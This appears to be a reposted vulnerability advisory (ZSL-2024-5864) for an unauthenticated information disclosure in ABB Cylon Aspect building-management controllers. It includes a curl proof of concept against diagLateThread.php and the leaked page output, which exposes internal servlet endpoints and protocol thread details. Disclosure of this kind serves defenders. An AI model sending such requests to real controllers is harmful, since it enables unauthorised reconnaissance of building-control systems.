ABB Cylon Aspect 3.08.01 diagLateThread.php Information Disclosure

ABB Cylon Aspect 3.08.01 diagLateThread.php Information Disclosure
2024-12-3 02:30:6 Author: packetstormsecurity.com(查看原文) 阅读量:1 收藏

ABB Cylon Aspect 3.08.01 (diagLateThread.php) Information DisclosureVendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from an unauthenticated information
disclosure vulnerability. An unauthorized attacker can reference the affected
page and disclose various protocol thread information running on the device.
Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
Advisory ID: ZSL-2024-5864
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5864.php
21.04.2024
--
$ cat project
                 P   R   O   J   E   C   T
                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 
$ curl -s http://192.168.73.31/diagLateThread.php | findstr /spina:d "Summary Thread"
7:    <title>Thread Class Status</title>
47:        #ProjectThreadStatus {
127:        var url ='//192.168.73.31/jsonProxy.php?port=7226&application=StatusServlet&query=showTimerThreadPoolStatus%3Dtrue%26descending%3Dtrue%26responseFormat%3Djson';
128:        var directUrl ='//192.168.73.31:7226/servlets/StatusServlet?showTimerThreadPoolStatus=true&descending=true&responseFormat=json';
203:            $.getJSON(url, processThreadInfo);
204:            //$.getJSON(directUrl, processThreadInfo);
248:            //infoText = "<div><h2 class='summaryHeading'>"+targetClass+" Class Summary</h2></div><div class='hideable'><div class='summaryInfo'></div>
306:        function processThreadInfo(json) {
308:            getClassStats(json, PUP_STR, pupLateTime, "PUPLateTable", "pupSummary");
309:            getClassStats(json, BACNET_STR, bacnetLateTime, "BACnetLateTable", "bacnetSummary");
310:            getClassStats(json, SDP_STR, sdpLateTime, "SDPLateTable", "sdpSummary");
311:            getClassStats(json, SCHEDULE_STR, scheduleLateTime, "ScheduleLateTable", "scheduleSummary");
312:            getClassStats(json, DEFAULT_STR, defaultLateTime, "DefaultLateTable", "defaultSummary");
315:            $("#ProjectThreadStatus").empty();
316:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'><h2>Thread Status at " + systemTime.toTimeString() + "</h2></div>");
317:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'>Total Timers: " + json.totalTimers + "</div>");
318:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'>Total Targets: " + json.totalTargets + "</div>");
323:            var warningTime = (timebase * 1000) * threadWarnPercent;
324:            var errorTime = (timebase * 1000) * threadErrorPercent;
534:    <div id="ProjectThreadStatus"></div>
537:        <div class='infoSection ThreadDiv' id="bacnetInfo">
538:            <div id="bacnetHeading"><h2>BACnet Summary</h2>
541:                    <div id="bacnetSummary"></div>
550:        <div class='infoSection ThreadDiv' id="pupInfo">
551:            <div id="pupHeading"><h2>PUP Summary</h2>
554:                    <div id="pupSummary"></div>
563:        <div class='infoSection ThreadDiv' id="sdpInfo">
564:            <div id="sdpHeading"><h2>SDP Summary</h2>
567:                    <div id="sdpSummary"></div>
576:        <div class='infoSection ThreadDiv' id="scheduleInfo">
577:            <div id="scheduleHeading"><h2>Schedule Summary</h2>
580:                    <div id="scheduleSummary"></div>
589:        <div class='infoSection ThreadDiv' id="defaultInfo">
590:            <div id="defaultHeading"><h2>Default Summary</h2>
593:                    <div id="defaultSummary"></div>
文章来源: https://packetstormsecurity.com/files/182908/ZSL-2024-5864.txt
如有侵权请联系:admin#unsafe.sh